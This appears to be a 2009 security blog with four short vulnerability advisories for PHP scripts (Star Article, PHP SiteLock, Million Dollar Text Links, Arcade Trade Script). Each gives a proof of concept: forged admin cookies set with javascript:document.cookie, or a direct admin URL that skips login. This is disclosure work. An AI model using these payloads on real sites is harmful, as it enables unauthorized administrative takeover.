Logo


Star Article Vulnerability

Published March 6th, 2009 in Security | No Comments »

Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling.

Name – admin_user
Content – admin
Path – /

Proof of Concept:

javascript:document.cookie=”admin_user=admin; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

Tags: ,

PHP SiteLock Vulnerability

Published March 5th, 2009 in Security | No Comments »

PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel.

Proof of Concept:

javascript:document.cookie=”user_type=admin; path=/”
javascript:document.cookie=”login_name=admin; path=/”
javascript:document.cookie=”login_id=0; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

Tags: ,

Million Dollar Text Links Vulnerability

Published March 3rd, 2009 in Security | No Comments »

Next up is Million Dollar Text Links which is a link exchange application. No authentication checks on the admin home page allows anyone to just browse to the admin contol panel and bypass the login procedure. This will allow full access to the admin panel.

Proof of Concept:

http://sitename[applicationpath]/admin.home.php

Vendor was contacted twice over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

Tags: ,

Arcade Script Vulnerability

Published March 2nd, 2009 in Security | No Comments »

I have found a few vulnerability’s in over the last few months which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding in the advisory. Most of them have been cookie related vulnerability’s.

First up is Arcade Trade Script v1.0. Insecure cookie handling allows anyone to simply create a custom cookie with the values below. This will allow full access to the admin panel of the ATS application.

Name – adminLoggedIn
Content – true
Path – /

You can create the cookie by running the following:

javascript:document.cookie =”adminLoggedIn=true; path=/”

The full advisory can be found Here.

Tags: ,